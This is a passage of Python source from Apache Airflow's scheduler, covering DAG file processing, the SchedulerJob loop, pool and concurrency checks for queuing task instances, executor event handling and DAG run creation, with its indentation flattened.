:param file_path: the path to the Python file that should be executed
:type file_path: str
:param callback_requests: failure callbacks to execute
:type callback_requests: List[airflow.utils.dag_processing.CallbackRequest]
:param pickle_dags: whether to serialize the DAGs found in the file and
save them to the DB
:type pickle_dags: bool
:param session: Sqlalchemy ORM Session
:type session: Session
:return: number of dags found, count of import errors
:rtype: Tuple[int, int]
"""
self.log.info("Processing file %s for tasks to queue", file_path)
try:
dagbag = DagBag(file_path, include_examples=False, include_smart_sensor=False)
except Exception: # pylint: disable=broad-except
self.log.exception("Failed at reloading the DAG file %s", file_path)
Stats.incr('dag_file_refresh_error', 1, 1)
return 0, 0
if len(dagbag.dags) > 0:
self.log.info("DAG(s) %s retrieved from %s", dagbag.dags.keys(), file_path)
else:
self.log.warning("No viable dags retrieved from %s", file_path)
self.update_import_errors(session, dagbag)
return 0, len(dagbag.import_errors)
self.execute_callbacks(dagbag, callback_requests)
# Save individual DAGs in the ORM
dagbag.sync_to_db()
if pickle_dags:
paused_dag_ids = DagModel.get_paused_dag_ids(dag_ids=dagbag.dag_ids)
unpaused_dags: List[DAG] = [
dag for dag_id, dag in dagbag.dags.items() if dag_id not in paused_dag_ids
]
for dag in unpaused_dags:
dag.pickle(session)
# Record import errors into the ORM
try:
self.update_import_errors(session, dagbag)
except Exception: # pylint: disable=broad-except
self.log.exception("Error logging import errors!")
return len(dagbag.dags), len(dagbag.import_errors)
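# A hedged usage sketch (constructor arguments elided, names hypothetical):
#     processor = DagFileProcessor(...)
#     dags_found, import_errors = processor.process_file(
#         file_path="/dags/example.py", callback_requests=[], pickle_dags=False
#     )
# The two counters let callers aggregate parse statistics across files.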
class SchedulerJob(BaseJob): # pylint: disable=too-many-instance-attributes
"""
This SchedulerJob runs for a specific time interval and schedules the jobs
that are ready to run. It figures out the latest runs for each
task and sees if the dependencies for the next schedules are met.
If so, it creates appropriate TaskInstances and sends run commands to the
executor. It does this for each task in each DAG and repeats.
:param subdir: directory containing Python files with Airflow DAG
definitions, or a specific path to a file
:type subdir: str
:param num_runs: The number of times to run the scheduling loop. If you
have a large number of DAG files this could complete before each file
has been parsed. -1 for unlimited times.
:type num_runs: int
:param num_times_parse_dags: The number of times to try to parse each DAG file.
-1 for unlimited times.
:type num_times_parse_dags: int
:param processor_poll_interval: The number of seconds to wait between
polls of running processors
:type processor_poll_interval: float
:param do_pickle: once a DAG object is obtained by executing the Python
file, whether to serialize the DAG object to the DB
:type do_pickle: bool
:param log: override the default Logger
:type log: logging.Logger
"""
__mapper_args__ = {'polymorphic_identity': 'SchedulerJob'}
heartrate: int = conf.getint('scheduler', 'SCHEDULER_HEARTBEAT_SEC')
def __init__(
self,
subdir: str = settings.DAGS_FOLDER,
num_runs: int = conf.getint('scheduler', 'num_runs'),
num_times_parse_dags: int = -1,
processor_poll_interval: float = conf.getfloat('scheduler', 'processor_poll_interval'),
do_pickle: bool = False,
log: logging.Logger = None,
*args,
**kwargs,
):
self.subdir = subdir
self.num_runs = num_runs
# In specific tests, we want to stop the parse loop after the _files_ have been parsed a certain
# number of times. This is only to support testing, and isn't something a user is likely to want to
# configure -- they'll want num_runs
self.num_times_parse_dags = num_times_parse_dags
self._processor_poll_interval = processor_poll_interval
self.do_pickle = do_pickle
super().__init__(*args, **kwargs)
if log:
self._log = log
# Check what SQL backend we use
sql_conn: str = conf.get('core', 'sql_alchemy_conn').lower()
self.using_sqlite = sql_conn.startswith('sqlite')
self.using_mysql = sql_conn.startswith('mysql')
self.max_tis_per_query: int = conf.getint('scheduler', 'max_tis_per_query')
self.processor_agent: Optional[DagFileProcessorAgent] = None
self.dagbag = DagBag(dag_folder=self.subdir, read_dags_from_db=True, load_op_links=False)
def register_signals(self) -> None:
"""Register signals that stop child processes"""
signal.signal(signal.SIGINT, self._exit_gracefully)
signal.signal(signal.SIGTERM, self._exit_gracefully)
signal.signal(signal.SIGUSR2, self._debug_dump)
def _exit_gracefully(self, signum, frame) -> None: # pylint: disable=unused-argument
"""Helper method to clean up processor_agent to avoid leaving orphan processes."""
self.log.info("Exiting gracefully upon receiving signal %s", signum)
if self.processor_agent:
self.processor_agent.end()
sys.exit(os.EX_OK)
def _debug_dump(self, signum, frame): # pylint: disable=unused-argument
try:
sig_name = signal.Signals(signum).name # pylint: disable=no-member
except Exception: # pylint: disable=broad-except
sig_name = str(signum)
self.log.info("%s\n%s received, printing debug\n%s", "-" * 80, sig_name, "-" * 80)
self.executor.debug_dump()
self.log.info("-" * 80)
def is_alive(self, grace_multiplier: Optional[float] = None) -> bool:
"""
Is this SchedulerJob alive?
We define alive as being in the RUNNING state with a heartbeat received
within the threshold defined in the ``scheduler_health_check_threshold``
config setting.
``grace_multiplier`` is accepted for compatibility with the parent class.
:rtype: bool
"""
if grace_multiplier is not None:
# Accept the same behaviour as superclass
return super().is_alive(grace_multiplier=grace_multiplier)
scheduler_health_check_threshold: int = conf.getint('scheduler', 'scheduler_health_check_threshold')
return (
self.state == State.RUNNING
and (timezone.utcnow() - self.latest_heartbeat).total_seconds() < scheduler_health_check_threshold
)
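# Worked example with hypothetical numbers: with
# scheduler_health_check_threshold=30, a RUNNING job whose latest heartbeat
# was 12 seconds ago is alive (12 < 30); one last seen 45 seconds ago is not.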
@provide_session
def _change_state_for_tis_without_dagrun(
self, old_states: List[str], new_state: str, session: Session = None
) -> None:
"""
For all DAG IDs in the DagBag, look for task instances in the
old_states and set them to new_state if the corresponding DagRun
does not exist or exists but is not in the running state. This
normally should not happen, but it can if the state of DagRuns is
changed manually.
:param old_states: examine TaskInstances in this state
:type old_states: list[airflow.utils.state.State]
:param new_state: set TaskInstances to this state
:type new_state: airflow.utils.state.State
"""
tis_changed = 0
query = (
session.query(models.TaskInstance)
.outerjoin(models.TaskInstance.dag_run)
.filter(models.TaskInstance.dag_id.in_(list(self.dagbag.dag_ids)))
.filter(models.TaskInstance.state.in_(old_states))
.filter(
or_(
# pylint: disable=comparison-with-callable
models.DagRun.state != State.RUNNING,
# pylint: disable=no-member
models.DagRun.state.is_(None),
)
)
)
# We need to do this for mysql as well because it can cause deadlocks
# as discussed in https://issues.apache.org/jira/browse/AIRFLOW-2516
if self.using_sqlite or self.using_mysql:
tis_to_change: List[TI] = with_row_locks(
query, of=TI, session=session, **skip_locked(session=session)
).all()
for ti in tis_to_change:
ti.set_state(new_state, session=session)
tis_changed += 1
else:
subq = query.subquery()
current_time = timezone.utcnow()
ti_prop_update = {
models.TaskInstance.state: new_state,
models.TaskInstance.start_date: current_time,
}
# Only add end_date and duration if the new_state is 'success', 'failed' or 'skipped'
if new_state in State.finished:
ti_prop_update.update(
{
models.TaskInstance.end_date: current_time,
models.TaskInstance.duration: 0,
}
)
tis_changed = (
session.query(models.TaskInstance)
.filter(
models.TaskInstance.dag_id == subq.c.dag_id,
models.TaskInstance.task_id == subq.c.task_id,
models.TaskInstance.execution_date == subq.c.execution_date,
)
.update(ti_prop_update, synchronize_session=False)
)
if tis_changed > 0:
session.flush()
self.log.warning(
"Set %s task instances to state=%s as their associated DagRun was not in RUNNING state",
tis_changed,
new_state,
)
Stats.gauge('scheduler.tasks.without_dagrun', tis_changed)
@provide_session
def __get_concurrency_maps(
self, states: List[str], session: Session = None
) -> Tuple[DefaultDict[str, int], DefaultDict[Tuple[str, str], int]]:
"""
Get the concurrency maps.
:param states: List of states to query for
:type states: list[airflow.utils.state.State]
:return: A map from dag_id to # of task instances and
a map from (dag_id, task_id) to # of task instances in the given state list
:rtype: tuple[dict[str, int], dict[tuple[str, str], int]]
"""
ti_concurrency_query: List[Tuple[str, str, int]] = (
session.query(TI.task_id, TI.dag_id, func.count('*'))
.filter(TI.state.in_(states))
.group_by(TI.task_id, TI.dag_id)
).all()
dag_map: DefaultDict[str, int] = defaultdict(int)
task_map: DefaultDict[Tuple[str, str], int] = defaultdict(int)
for result in ti_concurrency_query:
task_id, dag_id, count = result
dag_map[dag_id] += count
task_map[(dag_id, task_id)] = count
return dag_map, task_map
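# Example shape of the two returned maps (values hypothetical):
#     dag_map  = {"etl": 3, "reporting": 1}
#     task_map = {("etl", "extract"): 2, ("etl", "load"): 1,
#                 ("reporting", "send"): 1}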
# pylint: disable=too-many-locals,too-many-statements
@provide_session
def _executable_task_instances_to_queued(self, max_tis: int, session: Session = None) -> List[TI]:
"""
Finds TIs that are ready for execution with respect to pool limits,
dag concurrency, executor state, and priority.
:param max_tis: Maximum number of TIs to queue in this loop.
:type max_tis: int
:return: list[airflow.models.TaskInstance]
"""
executable_tis: List[TI] = []
# Get the pool settings. We get a lock on the pool rows, treating this as a "critical section"
# Throws an exception if lock cannot be obtained, rather than blocking
pools = models.Pool.slots_stats(lock_rows=True, session=session)
# If the pools are full, there is no point doing anything!
# If _somehow_ the pool is overfull, don't let the limit go negative - it breaks SQL
pool_slots_free = max(0, sum(pool['open'] for pool in pools.values()))
if pool_slots_free == 0:
self.log.debug("All pools are full!")
return executable_tis
max_tis = min(max_tis, pool_slots_free)
# Get all task instances associated with scheduled
# DagRuns which are not backfilled, in the given states,
# and whose DAG is not paused
query = (
session.query(TI)
.outerjoin(TI.dag_run)
.filter(or_(DR.run_id.is_(None), DR.run_type != DagRunType.BACKFILL_JOB))
.join(TI.dag_model)
.filter(not_(DM.is_paused))
.filter(TI.state == State.SCHEDULED)
.options(selectinload('dag_model'))
)
starved_pools = [pool_name for pool_name, stats in pools.items() if stats['open'] <= 0]
if starved_pools:
query = query.filter(not_(TI.pool.in_(starved_pools)))
query = query.limit(max_tis)
task_instances_to_examine: List[TI] = with_row_locks(
query,
of=TI,
session=session,
**skip_locked(session=session),
).all()
# TODO[HA]: This was wrong before anyway, as it only looked at a sub-set of dags, not everything.
# Stats.gauge('scheduler.tasks.pending', len(task_instances_to_examine))
if len(task_instances_to_examine) == 0:
self.log.debug("No tasks to consider for execution.")
return executable_tis
# Put one task instance on each line
task_instance_str = "\n\t".join(repr(x) for x in task_instances_to_examine)
self.log.info("%s tasks up for execution:\n\t%s", len(task_instances_to_examine), task_instance_str)
pool_to_task_instances: DefaultDict[str, List[models.Pool]] = defaultdict(list)
for task_instance in task_instances_to_examine:
pool_to_task_instances[task_instance.pool].append(task_instance)
# dag_id to # of running tasks and (dag_id, task_id) to # of running tasks.
dag_concurrency_map: DefaultDict[str, int]
task_concurrency_map: DefaultDict[Tuple[str, str], int]
dag_concurrency_map, task_concurrency_map = self.__get_concurrency_maps(
states=list(EXECUTION_STATES), session=session
)
num_tasks_in_executor = 0
# Number of tasks that cannot be scheduled because of no open slot in pool
num_starving_tasks_total = 0
# Go through each pool, and queue up a task for execution if there are
# any open slots in the pool.
# pylint: disable=too-many-nested-blocks
for pool, task_instances in pool_to_task_instances.items():
pool_name = pool
if pool not in pools:
self.log.warning("Tasks using non-existent pool '%s' will not be scheduled", pool)
continue
open_slots = pools[pool]["open"]
num_ready = len(task_instances)
self.log.info(
"Figuring out tasks to run in Pool(name=%s) with %s open slots "
"and %s task instances ready to be queued",
pool,
open_slots,
num_ready,
)
priority_sorted_task_instances = sorted(
task_instances, key=lambda ti: (-ti.priority_weight, ti.execution_date)
)
num_starving_tasks = 0
for current_index, task_instance in enumerate(priority_sorted_task_instances):
if open_slots <= 0:
self.log.info("Not scheduling since there are %s open slots in pool %s", open_slots, pool)
# Can't schedule any more since there are no more open slots.
num_unhandled = len(priority_sorted_task_instances) - current_index
num_starving_tasks += num_unhandled
num_starving_tasks_total += num_unhandled
break
# Check to make sure that the task concurrency of the DAG hasn't been
# reached.
dag_id = task_instance.dag_id
current_dag_concurrency = dag_concurrency_map[dag_id]
dag_concurrency_limit = task_instance.dag_model.concurrency
self.log.info(
"DAG %s has %s/%s running and queued tasks",
dag_id,
current_dag_concurrency,
dag_concurrency_limit,
)
if current_dag_concurrency >= dag_concurrency_limit:
self.log.info(
"Not executing %s since the number of tasks running or queued "
"from DAG %s is >= to the DAG's task concurrency limit of %s",
task_instance,
dag_id,
dag_concurrency_limit,
)
continue
task_concurrency_limit: Optional[int] = None
if task_instance.dag_model.has_task_concurrency_limits:
# Many dags don't have a task_concurrency, so if we can avoid loading the
# full serialized DAG, so much the better.
serialized_dag = self.dagbag.get_dag(dag_id, session=session)
if serialized_dag.has_task(task_instance.task_id):
task_concurrency_limit = serialized_dag.get_task(
task_instance.task_id
).task_concurrency
if task_concurrency_limit is not None:
current_task_concurrency = task_concurrency_map[
(task_instance.dag_id, task_instance.task_id)
]
if current_task_concurrency >= task_concurrency_limit:
self.log.info(
"Not executing %s since the task concurrency for"
" this task has been reached.",
task_instance,
)
continue
if task_instance.pool_slots > open_slots:
self.log.info(
"Not executing %s since it requires %s slots "
"but there are %s open slots in the pool %s.",
task_instance,
task_instance.pool_slots,
open_slots,
pool,
)
num_starving_tasks += 1
num_starving_tasks_total += 1
# Though we can execute tasks with lower priority if there's enough room
continue
executable_tis.append(task_instance)
open_slots -= task_instance.pool_slots
dag_concurrency_map[dag_id] += 1
task_concurrency_map[(task_instance.dag_id, task_instance.task_id)] += 1
Stats.gauge(f'pool.starving_tasks.{pool_name}', num_starving_tasks)
Stats.gauge('scheduler.tasks.starving', num_starving_tasks_total)
Stats.gauge('scheduler.tasks.running', num_tasks_in_executor)
Stats.gauge('scheduler.tasks.executable', len(executable_tis))
task_instance_str = "\n\t".join(repr(x) for x in executable_tis)
self.log.info("Setting the following tasks to queued state:\n\t%s", task_instance_str)
# set TIs to queued state
filter_for_tis = TI.filter_for_tis(executable_tis)
session.query(TI).filter(filter_for_tis).update(
# TODO[ha]: should we use func.now()? How does that work with DB timezone on mysql when it's not
# UTC?
{TI.state: State.QUEUED, TI.queued_dttm: timezone.utcnow(), TI.queued_by_job_id: self.id},
synchronize_session=False,
)
for ti in executable_tis:
make_transient(ti)
return executable_tis
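# The priority ordering used above, in miniature (hypothetical TIs): sorting
# by (-priority_weight, execution_date) puts weight=10/Jan-01 before
# weight=10/Jan-02, and both before weight=5/Jan-01 -- higher weight first,
# earlier execution date breaking ties.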
def _enqueue_task_instances_with_queued_state(self, task_instances: List[TI]) -> None:
"""
Takes task_instances, which should have been set to queued, and enqueues them
with the executor.
:param task_instances: TaskInstances to enqueue
:type task_instances: list[TaskInstance]
"""
# actually enqueue them
for ti in task_instances:
command = TI.generate_command(
ti.dag_id,
ti.task_id,
ti.execution_date,
local=True,
mark_success=False,
ignore_all_deps=False,
ignore_depends_on_past=False,
ignore_task_deps=False,
ignore_ti_state=False,
pool=ti.pool,
file_path=ti.dag_model.fileloc,
pickle_id=ti.dag_model.pickle_id,
)
priority = ti.priority_weight
queue = ti.queue
self.log.info("Sending %s to executor with priority %s and queue %s", ti.key, priority, queue)
self.executor.queue_command(
ti,
command,
priority=priority,
queue=queue,
)
def _critical_section_execute_task_instances(self, session: Session) -> int:
"""
Attempts to execute TaskInstances that should be executed by the scheduler.
There are three steps:
1. Pick TIs by priority with the constraint that they are in the expected states
and that we do not exceed max_active_runs or pool limits.
2. Change the state for the TIs above atomically.
3. Enqueue the TIs in the executor.
HA note: This function is a "critical section" meaning that only a single executor process can execute
this function at the same time. This is achieved by doing ``SELECT ... from pool FOR UPDATE``. For DBs
that support NOWAIT, a "blocked" scheduler will skip this and continue on with other tasks (creating
new DAG runs, progressing TIs from None to SCHEDULED etc.); for DBs that don't support this (such as
MariaDB or MySQL 5.x), the other schedulers will wait for the lock before continuing.
:param session:
:type session: sqlalchemy.orm.Session
:return: Number of task instances with state changed.
"""
if self.max_tis_per_query == 0:
max_tis = self.executor.slots_available
else:
max_tis = min(self.max_tis_per_query, self.executor.slots_available)
queued_tis = self._executable_task_instances_to_queued(max_tis, session=session)
self._enqueue_task_instances_with_queued_state(queued_tis)
return len(queued_tis)
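# Sizing example (hypothetical values): with max_tis_per_query=512 and 32
# executor slots available, at most min(512, 32) = 32 TIs are queued in this
# pass; setting max_tis_per_query=0 removes the per-query cap entirely.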
@provide_session
def _change_state_for_tasks_failed_to_execute(self, session: Session = None):
"""
If there are tasks left over in the executor,
we set them back to SCHEDULED to avoid creating hanging tasks.
:param session: session for ORM operations
"""
if not self.executor.queued_tasks:
return
filter_for_ti_state_change = [
and_(
TI.dag_id == dag_id,
TI.task_id == task_id,
TI.execution_date == execution_date,
# TI.try_number returns the raw try_number + 1 when the
# ti is not running, so we subtract 1 to match the DB record.
TI._try_number == try_number - 1, # pylint: disable=protected-access
TI.state == State.QUEUED,
)
for dag_id, task_id, execution_date, try_number in self.executor.queued_tasks.keys()
]
ti_query = session.query(TI).filter(or_(*filter_for_ti_state_change))
tis_to_set_to_scheduled: List[TI] = with_row_locks(ti_query, session=session).all()
if not tis_to_set_to_scheduled:
return
# set TIs back to the scheduled state
filter_for_tis = TI.filter_for_tis(tis_to_set_to_scheduled)
session.query(TI).filter(filter_for_tis).update(
{TI.state: State.SCHEDULED, TI.queued_dttm: None}, synchronize_session=False
)
for task_instance in tis_to_set_to_scheduled:
self.executor.queued_tasks.pop(task_instance.key)
task_instance_str = "\n\t".join(repr(x) for x in tis_to_set_to_scheduled)
self.log.info("Set the following tasks to scheduled state:\n\t%s", task_instance_str)
@provide_session
def _process_executor_events(self, session: Session = None) -> int:
"""Respond to executor events."""
if not self.processor_agent:
raise ValueError("Processor agent is not started.")
ti_primary_key_to_try_number_map: Dict[Tuple[str, str, datetime.datetime], int] = {}
event_buffer = self.executor.get_event_buffer()
tis_with_right_state: List[TaskInstanceKey] = []
# Report execution
for ti_key, value in event_buffer.items():
state: str
state, _ = value
# We create a map (dag_id, task_id, execution_date) -> in-memory try_number
ti_primary_key_to_try_number_map[ti_key.primary] = ti_key.try_number
self.log.info(
"Executor reports execution of %s.%s execution_date=%s "
"exited with status %s for try_number %s",
ti_key.dag_id,
ti_key.task_id,
ti_key.execution_date,
state,
ti_key.try_number,
)
if state in (State.FAILED, State.SUCCESS, State.QUEUED):
tis_with_right_state.append(ti_key)
# Return if no finished tasks
if not tis_with_right_state:
return len(event_buffer)
# Check state of finished tasks
filter_for_tis = TI.filter_for_tis(tis_with_right_state)
tis: List[TI] = session.query(TI).filter(filter_for_tis).options(selectinload('dag_model')).all()
for ti in tis:
try_number = ti_primary_key_to_try_number_map[ti.key.primary]
buffer_key = ti.key.with_try_number(try_number)
state, info = event_buffer.pop(buffer_key)
# TODO: should we fail RUNNING as well, as we do in Backfills?
if state == State.QUEUED:
ti.external_executor_id = info
self.log.info("Setting external_id for %s to %s", ti, info)
continue
if ti.try_number == buffer_key.try_number and ti.state == State.QUEUED:
Stats.incr('scheduler.tasks.killed_externally')
msg = (
"Executor reports task instance %s finished (%s) although the "
"task says its %s. (Info: %s) Was the task killed externally?"
)
self.log.error(msg, ti, state, ti.state, info)
request = TaskCallbackRequest(
full_filepath=ti.dag_model.fileloc,
simple_task_instance=SimpleTaskInstance(ti),
msg=msg % (ti, state, ti.state, info),
)
self.log.info('Setting task instance %s state to %s as reported by executor', ti, state)
ti.set_state(state)
self.processor_agent.send_callback_to_execute(request)
return len(event_buffer)
def _execute(self) -> None:
self.log.info("Starting the scheduler")
# DAGs can be pickled for easier remote execution by some executors
pickle_dags = self.do_pickle and self.executor_class not in UNPICKLEABLE_EXECUTORS
self.log.info("Processing each file at most %s times", self.num_times_parse_dags)
# When using sqlite, we do not use async_mode
# so the scheduler job and DAG parser don't access the DB at the same time.
async_mode = not self.using_sqlite
processor_timeout_seconds: int = conf.getint('core', 'dag_file_processor_timeout')
processor_timeout = timedelta(seconds=processor_timeout_seconds)
self.processor_agent = DagFileProcessorAgent(
dag_directory=self.subdir,
max_runs=self.num_times_parse_dags,
processor_factory=type(self)._create_dag_file_processor,
processor_timeout=processor_timeout,
dag_ids=[],
pickle_dags=pickle_dags,
async_mode=async_mode,
)
try:
self.executor.job_id = self.id
self.executor.start()
self.register_signals()
self.processor_agent.start()
execute_start_time = timezone.utcnow()
self._run_scheduler_loop()
# Stop any processors
self.processor_agent.terminate()
# Verify that all files were processed, and if so, deactivate DAGs that
# haven't been touched by the scheduler as they likely have been
# deleted.
if self.processor_agent.all_files_processed:
self.log.info(
"Deactivating DAGs that haven't been touched since %s", execute_start_time.isoformat()
)
models.DAG.deactivate_stale_dags(execute_start_time)
settings.Session.remove() # type: ignore
except Exception: # pylint: disable=broad-except
self.log.exception("Exception when executing SchedulerJob._run_scheduler_loop")
raise
finally:
try:
self.executor.end()
except Exception: # pylint: disable=broad-except
self.log.exception("Exception when executing Executor.end")
try:
self.processor_agent.end()
except Exception: # pylint: disable=broad-except
self.log.exception("Exception when executing DagFileProcessorAgent.end")
self.log.info("Exited execute loop")
@staticmethod
def _create_dag_file_processor(
file_path: str,
callback_requests: List[CallbackRequest],
dag_ids: Optional[List[str]],
pickle_dags: bool,
) -> DagFileProcessorProcess:
"""Creates DagFileProcessorProcess instance."""
return DagFileProcessorProcess(
file_path=file_path, pickle_dags=pickle_dags, dag_ids=dag_ids, callback_requests=callback_requests
)
def _run_scheduler_loop(self) -> None:
"""
The actual scheduler loop. The main steps in the loop are:
#. Harvest DAG parsing results through DagFileProcessorAgent
#. Find and queue executable tasks
#. Change task instance state in DB
#. Queue tasks in executor
#. Heartbeat executor
#. Execute queued tasks in executor asynchronously
#. Sync on the states of running tasks
Following is a graphic representation of these steps.
.. image:: ../docs/apache-airflow/img/scheduler_loop.jpg
:rtype: None
"""
if not self.processor_agent:
raise ValueError("Processor agent is not started.")
is_unit_test: bool = conf.getboolean('core', 'unit_test_mode')
timers = EventScheduler()
# Check on start up, then every configured interval
self.adopt_or_reset_orphaned_tasks()
timers.call_regular_interval(
conf.getfloat('scheduler', 'orphaned_tasks_check_interval', fallback=300.0),
self.adopt_or_reset_orphaned_tasks,
)
timers.call_regular_interval(
conf.getfloat('scheduler', 'pool_metrics_interval', fallback=5.0),
self._emit_pool_metrics,
)
timers.call_regular_interval(
conf.getfloat('scheduler', 'clean_tis_without_dagrun_interval', fallback=15.0),
self._clean_tis_without_dagrun,
)
for loop_count in itertools.count(start=1):
with Stats.timer() as timer:
if self.using_sqlite:
self.processor_agent.run_single_parsing_loop()
# For the sqlite case w/ 1 thread, wait until the processor
# is finished to avoid concurrent access to the DB.
self.log.debug("Waiting for processors to finish since we're using sqlite")
self.processor_agent.wait_until_finished()
with create_session() as session:
num_queued_tis = self._do_scheduling(session)
self.executor.heartbeat()
session.expunge_all()
num_finished_events = self._process_executor_events(session=session)
self.processor_agent.heartbeat()
# Heartbeat the scheduler periodically
self.heartbeat(only_if_necessary=True)
# Run any pending timed events
next_event = timers.run(blocking=False)
self.log.debug("Next timed event is in %f", next_event)
self.log.debug("Ran scheduling loop in %.2f seconds", timer.duration)
if not is_unit_test and not num_queued_tis and not num_finished_events:
# If the scheduler is doing things, don't sleep. This means when there is work to do, the
# scheduler will run "as quickly as possible", but when it's stopped, it can sleep, dropping CPU
# usage when "idle"
time.sleep(min(self._processor_poll_interval, next_event))
if loop_count >= self.num_runs > 0:
self.log.info(
"Exiting scheduler loop as requested number of runs (%d - got to %d) has been reached",
self.num_runs,
loop_count,
)
break
if self.processor_agent.done:
self.log.info(
"Exiting scheduler loop as requested DAG parse count (%d) has been reached after %d"
" scheduler loops",
self.num_times_parse_dags,
loop_count,
)
break
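# Idle-sleep sketch (hypothetical numbers): with processor_poll_interval=1.0
# and the next timed event 0.3s away, an idle iteration sleeps
# min(1.0, 0.3) = 0.3s; a busy iteration (queued TIs or executor events)
# skips the sleep and loops again immediately.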
@provide_session
def _clean_tis_without_dagrun(self, session):
with prohibit_commit(session) as guard:
try:
self._change_state_for_tis_without_dagrun(
old_states=[State.UP_FOR_RETRY], new_state=State.FAILED, session=session
)
self._change_state_for_tis_without_dagrun(
old_states=[State.QUEUED, State.SCHEDULED, State.UP_FOR_RESCHEDULE, State.SENSING],
new_state=State.NONE,
session=session,
)
guard.commit()
except OperationalError as e:
if is_lock_not_available_error(error=e):
self.log.debug("Lock held by another Scheduler")
session.rollback()
else:
raise
guard.commit()
def _do_scheduling(self, session) -> int:
"""
This function is where the main scheduling decisions take place. It:
- Creates any necessary DAG runs by examining the next_dagrun_create_after column of DagModel
Since creating Dag Runs is a relatively time consuming process, we select only 10 dags by default
(configurable via ``scheduler.max_dagruns_to_create_per_loop`` setting) - putting this higher will
mean one scheduler could spend a chunk of time creating dag runs, and not ever get around to
scheduling tasks.
- Finds the "next n oldest" running DAG Runs to examine for scheduling (n=20 by default, configurable
via ``scheduler.max_dagruns_per_loop_to_schedule`` config setting) and tries to progress state (TIs
to SCHEDULED, or DagRuns to SUCCESS/FAILURE etc)
By "next oldest", we mean hasn't been examined/scheduled in the most time.
The reason we don't select all dagruns at once because the rows are selected with row locks, meaning
that only one scheduler can "process them", even it is waiting behind other dags. Increasing this
limit will allow more throughput for smaller DAGs but will likely slow down throughput for larger
(>500 tasks.) DAGs
- Then, via a Critical Section (locking the rows of the Pool model) we queue tasks, and then send them
to the executor.
See docs of _critical_section_execute_task_instances for more.
:return: Number of TIs enqueued in this iteration
:rtype: int
"""
# Put a check in place to make sure we don't commit unexpectedly
with prohibit_commit(session) as guard:
if settings.USE_JOB_SCHEDULE:
self._create_dagruns_for_dags(guard, session)
dag_runs = self._get_next_dagruns_to_examine(session)
# Bulk fetch the currently active dag runs for the dags we are
# examining, rather than making one query per DagRun
# TODO: This query is probably horribly inefficient (though there is an
# index on (dag_id,state)). It is to deal with the case when a user
# clears more than max_active_runs older tasks -- we don't want the
# scheduler to suddenly go and start running tasks from all of the
# runs. (AIRFLOW-137/GH #1442)
#
# The longer term fix would be to have `clear` do this, and put DagRuns
# in to the queued state, then take DRs out of queued before creating
# any new ones
# Build up a set of execution_dates that are "active" for a given
# dag_id -- only tasks from those runs will be scheduled.
active_runs_by_dag_id = defaultdict(set)
query = (
session.query(
TI.dag_id,
TI.execution_date,
)
.filter(
TI.dag_id.in_(list({dag_run.dag_id for dag_run in dag_runs})),
TI.state.notin_(list(State.finished) + [State.REMOVED]),
)
.group_by(TI.dag_id, TI.execution_date)
)
for dag_id, execution_date in query:
active_runs_by_dag_id[dag_id].add(execution_date)
for dag_run in dag_runs:
# Use try/except so that a missing Serialized DAG does not stop the Scheduler
# This takes care of Dynamic DAGs especially
# SerializedDagNotFound should not happen here in the same loop because the DagRun would
# not be created in self._create_dag_runs if Serialized DAG does not exist
# But this would take care of the scenario when the Scheduler is restarted after DagRun is
# created and the DAG is deleted / renamed
try:
self._schedule_dag_run(dag_run, active_runs_by_dag_id.get(dag_run.dag_id, set()), session)
except SerializedDagNotFound:
self.log.exception("DAG '%s' not found in serialized_dag table", dag_run.dag_id)
continue
guard.commit()
# Without this, the session has an invalid view of the DB
session.expunge_all()
# END: schedule TIs
try:
if self.executor.slots_available <= 0:
# We know we can't do anything here, so don't even try!
self.log.debug("Executor full, skipping critical section")
return 0
timer = Stats.timer('scheduler.critical_section_duration')
timer.start()
# Find any TIs in state SCHEDULED and try to QUEUE them (send them to the executor)
num_queued_tis = self._critical_section_execute_task_instances(session=session)
# Make sure we only send this metric if we obtained the lock; otherwise we'll skew the
# metric way down
timer.stop(send=True)
except OperationalError as e:
timer.stop(send=False)
if is_lock_not_available_error(error=e):
self.log.debug("Critical section lock held by another Scheduler")
Stats.incr('scheduler.critical_section_busy')
session.rollback()
return 0
raise
guard.commit()
return num_queued_tis
@retry_db_transaction
def _get_next_dagruns_to_examine(self, session):
"""Get Next DagRuns to Examine with retries"""
return DagRun.next_dagruns_to_examine(session)
@retry_db_transaction
def _create_dagruns_for_dags(self, guard, session):
"""Find Dag Models needing DagRuns and Create Dag Runs with retries in case of OperationalError"""
query = DagModel.dags_needing_dagruns(session)
self._create_dag_runs(query.all(), session)
# commit the session - Release the write lock on DagModel table.
guard.commit()
# END: create dagruns
def _create_dag_runs(self, dag_models: Iterable[DagModel], session: Session) -> None:
"""
Unconditionally create a DAG run for the given DAG, and update the dag_model's fields to control
if/when the next DAGRun should be created
"""
# Bulk Fetch DagRuns with dag_id and execution_date same
# as DagModel.dag_id and DagModel.next_dagrun
# This list is used to verify if the DagRun already exists so that we don't attempt to create
# duplicate dag runs
active_dagruns = (
session.query(DagRun.dag_id, DagRun.execution_date)
.filter(
tuple_(DagRun.dag_id, DagRun.execution_date).in_(
[(dm.dag_id, dm.next_dagrun) for dm in dag_models]
)
)
.all()
)
for dag_model in dag_models:
try:
dag = self.dagbag.get_dag(dag_model.dag_id, session=session)
except SerializedDagNotFound:
self.log.exception("DAG '%s' not found in serialized_dag table", dag_model.dag_id)
continue
dag_hash = self.dagbag.dags_hash.get(dag.dag_id)
# Explicitly check if the DagRun already exists. This is an edge case
# where a Dag Run is created but `DagModel.next_dagrun` and `DagModel.next_dagrun_create_after`
# are not updated.
# We opted to check DagRun existence instead
# of catching an IntegrityError and rolling back the session, i.e.
# we need to run self._update_dag_next_dagruns if the Dag Run already exists or if we
# create a new one. This is so that in the next scheduling loop we try to create new runs
# instead of falling into a loop of IntegrityErrors.
if (dag.dag_id, dag_model.next_dagrun) not in active_dagruns:
run = dag.create_dagrun(
run_type=DagRunType.SCHEDULED,
execution_date=dag_model.next_dagrun,
start_date=timezone.utcnow(),
state=State.RUNNING,
external_trigger=False,
session=session,
dag_hash=dag_hash,
creating_job_id=self.id,
)
expected_start_date = dag.following_schedule(run.execution_date)
if expected_start_date:
schedule_delay = run.start_date - expected_start_date
Stats.timing(
f'dagrun.schedule_delay.{dag.dag_id}',
schedule_delay,
)
self._update_dag_next_dagruns(dag_models, session)
# TODO[HA]: Should we do a session.flush() so we don't have to keep lots of state/object in
# memory for larger dags? or expunge_all()
def _update_dag_next_dagruns(self, dag_models: Iterable[DagModel], session: Session) -> None:
"""
Bulk update the next_dagrun and next_dagrun_create_after for all the dags.
We batch the select queries to get info about all the dags at once
"""
# Check max_active_runs, to see if we are _now_ at the limit for any of
# these dags (we've just created a DagRun for them, after all)
